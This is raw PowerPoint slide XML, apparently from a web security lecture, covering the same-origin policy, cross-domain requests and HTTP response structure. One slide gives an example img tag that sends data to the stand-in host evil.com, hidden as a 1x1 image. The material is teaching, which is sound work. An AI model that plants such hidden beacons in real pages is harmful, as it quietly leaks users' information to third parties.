            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP Does Not Control Sending</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67586" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8F82EB-9737-A441-8888-8BA93432337D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846137" y="2538919"/>
            <a:ext cx="4602152" cy="3557805"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Same origin policy (SOP) controls access to DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Scripts can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" u="sng" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> anywhere!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>No user involvement required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can only read response from the same origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162751626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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2AD6B69-E0A0-476D-9EE1-6B69F04C59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16BE10A1-AD5F-4AB3-8A94-41D62B494A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4419599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68609" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D82A2F77-2163-014F-B428-1F39A439593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73409" y="559477"/>
            <a:ext cx="3765200" cy="5709931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Sending a Cross-Domain GET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5684BFFE-6A90-4311-ACD5-B34177D464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4122323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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68612" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912DE61C-9469-4DAF-99E1-44EFA494BC7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01893776"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5478124" y="800947"/>
          <a:ext cx="6479180" cy="52307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70891129"/>
      </p:ext>
    </p:extLst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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080D7E1A-87DB-6944-B2B1-6DAB76366B2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Using Images to Send Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69634" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D95A355-8DDE-1846-9D21-60C26E47DB21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en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Encode data in the image’s URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>pass-local-information.jpg?extra_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Hide the fetched image </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“ … ” height=“1" width=“1"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72DF9BDC-8DAE-7140-976B-E0F81D2AB6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49776" y="4615680"/>
            <a:ext cx="3794346" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Key point: </a:t>
            </a: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kumimoji="0" lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>a webpage can send information to any site!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69637" name="Picture 4" descr="beach sunset">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B126B405-0206-AE47-8039-FF9C511C2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4834" y="5115952"/>
            <a:ext cx="1151016" cy="863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Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD4DFFE-1FA3-5248-BCEF-08C25CDAD5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00297" y="3887901"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Shape&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9A217A-AC64-7D46-8D58-03F5422A8B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0061" y="4183028"/>
            <a:ext cx="1573687" cy="157368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BE43B4-8132-6F42-B7AD-CE0C37388D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9411603" y="3518670"/>
            <a:ext cx="742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Site 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30CA7B1-23D6-C849-A525-A742F3FB82AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9411603" y="4750928"/>
            <a:ext cx="742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Site B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103CE57-DFF3-9148-B92D-4CBFD4AE27F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7834981" y="4099312"/>
            <a:ext cx="1671480" cy="822960"/>
            <a:chOff x="7834981" y="4099312"/>
            <a:chExt cx="1671480" cy="822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D8F95749-ACA0-0E42-9BBC-3DD5807475BE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7834981" y="4099312"/>
                <a:ext cx="1671480" cy="77580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D8F95749-ACA0-0E42-9BBC-3DD5807475BE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816981" y="4081312"/>
                  <a:ext cx="1707120" cy="81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BDC4464B-AA7C-6E4E-994D-8757F24CD586}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7849381" y="4891312"/>
                <a:ext cx="198360" cy="309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BDC4464B-AA7C-6E4E-994D-8757F24CD586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831741" y="4873672"/>
                  <a:ext cx="234000" cy="66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F96B79C-1371-934A-9A5B-16575D157574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7883221" y="5240872"/>
            <a:ext cx="1326960" cy="548280"/>
            <a:chOff x="7883221" y="5240872"/>
            <a:chExt cx="1326960" cy="548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1F7EE441-8865-3A4B-907B-1D607789E699}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7883221" y="5240872"/>
                <a:ext cx="1312200" cy="4500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1F7EE441-8865-3A4B-907B-1D607789E699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865581" y="5223232"/>
                  <a:ext cx="1347840" cy="48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3C1B37A8-1C46-B54D-8710-A6EF17926A85}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8911021" y="5704912"/>
                <a:ext cx="299160" cy="842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3C1B37A8-1C46-B54D-8710-A6EF17926A85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8893021" y="5686912"/>
                  <a:ext cx="334800" cy="1198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DF895381-207E-6E48-AE59-362C2817B8FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825471" y="4906792"/>
            <a:ext cx="1552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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= …&gt;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C1AC603-2276-144D-B2BE-08296F87F7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8253024" y="5702985"/>
            <a:ext cx="572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GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2137606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4" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="1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ext Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59E3800-1D49-2342-BE0A-D24319178D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85988" y="2760664"/>
            <a:ext cx="7086600" cy="2573337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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 typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.0 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Sun, 21 Apr 1996 02:20:42 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server: Microsoft-Internet-Information-Server/5.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 2543</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404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ClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED505CC4-B455-034E-A084-EAC51997410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HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB9E466-B988-2549-9D7F-1F3E9ACBCF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09788" y="1790701"/>
            <a:ext cx="145745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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B08C71-94AA-4445-ABC6-6A7D07CC78AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2871788" y="2114550"/>
            <a:ext cx="0" cy="533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9462" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60316829-E778-E141-A294-64CD99CFB4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29063" y="1790701"/>
            <a:ext cx="130837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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Status code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{444A1EEB-2A5D-CC4D-AF37-E202FA30C1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68950" y="1790701"/>
            <a:ext cx="160172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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reason phrase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19464" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372C5D7C-5113-274E-AAA1-CD3EC3797E4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862388" y="2114550"/>
            <a:ext cx="685800" cy="66198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9465" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4CE112-1C10-854E-9ADE-E6E1FDC959A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395788" y="2114550"/>
            <a:ext cx="1676400" cy="73818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9466" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8074662E-6613-BC4C-87AD-D4B05E86F6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15388" y="1866901"/>
            <a:ext cx="98616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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19467" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF8C402-D867-9C4E-950B-427CCAA77D7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900988" y="2190750"/>
            <a:ext cx="1371600" cy="104298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9468" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3EB1C1D-2310-8D45-8750-9BA6099BFD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31350" y="3843338"/>
            <a:ext cx="63671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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19469" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435AB0D9-D4DB-A34F-AD41-703F4341EF5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382000" y="4224338"/>
            <a:ext cx="1454150" cy="8382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43203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Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB6CEC54-CD13-C34C-8B74-D604AB2966A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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SOP for HTTP Responses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70658" name="Content Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B444330-9EED-054D-8C02-63705CABBB81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en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
